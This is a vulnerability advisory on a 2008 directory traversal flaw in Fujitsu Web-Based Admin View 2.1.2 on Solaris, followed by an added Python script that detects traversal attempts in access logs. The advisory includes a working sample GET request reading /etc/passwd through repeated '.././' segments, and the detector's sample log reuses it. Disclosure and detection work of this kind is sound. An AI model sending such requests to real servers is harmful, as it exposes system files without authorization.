Fujitsu Web-Based Admin View Directory Traversal Vulnerability

2008.08.22
Credit: Deniz Cevik
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Fujitsu Web-Based Admin View Directory Traversal Vulnerability

Version: 2.1.2 on Solaris. Other versions may be vulnerable.
Vulnerability: Directory Traversal
Risk: Critical

Description: Due to insufficient control of user inputs, Fujitsu Web-Based Admin View reveals the content of files residing in folders other than the webroot. This will allow an attacker to view arbitrary local files within the context of the web server.

Sample Request:

    GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0
    Host: target:8081

Deniz CEVIK
www.intellectpro.com.tr

References:

http://seclists.org/fulldisclosure/2008/Aug/0411.html
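An added detection example, not part of the original advisory and not vendor code: it resolves each logged request path segment by segment and flags any that climb above the web root, which catches the interleaved `.././` form in the sample request even though the literal string `../../` never appears in it. The function names, the log format (common access-log style) and the log lines other than the advisory's request path are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Matches the request line inside a common/combined access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST|PUT|DELETE|OPTIONS) (\S+) HTTP/\d\.\d"')

def escapes_webroot(raw_path, max_decodes=3):
    """Return True if resolving raw_path would climb above the web root."""
    path = raw_path.split("?", 1)[0]
    # Normalise percent-encoding (bounded) before inspecting segments.
    for _ in range(max_decodes):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    depth = 0
    for segment in re.split(r"[/\\]+", path):
        if segment in ("", "."):
            continue              # "./" and empty segments do not change depth
        if segment == "..":
            depth -= 1
            if depth < 0:         # stepped above the web root
                return True
        else:
            depth += 1
    return False

def flag_traversal(log_lines):
    """Return the request paths in log_lines that escape the web root."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and escapes_webroot(m.group(1)):
            hits.append(m.group(1))
    return hits

# Constructed sample log lines (documentation IP range); the second path is the advisory's.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Aug/2008:10:00:01 +0000] "GET /index.html HTTP/1.0" 200 512',
    '192.0.2.10 - - [22/Aug/2008:10:00:02 +0000] '
    '"GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0" 200 1024',
    '192.0.2.11 - - [22/Aug/2008:10:00:03 +0000] "GET /docs/../index.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for path in flag_traversal(SAMPLE_LOG):
        print("path escapes web root:", path)
```

The same segment-walking check can be applied server-side before a path is mapped to the filesystem, rejecting the request instead of logging it.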



Copyright 2024, cxsecurity.com

 
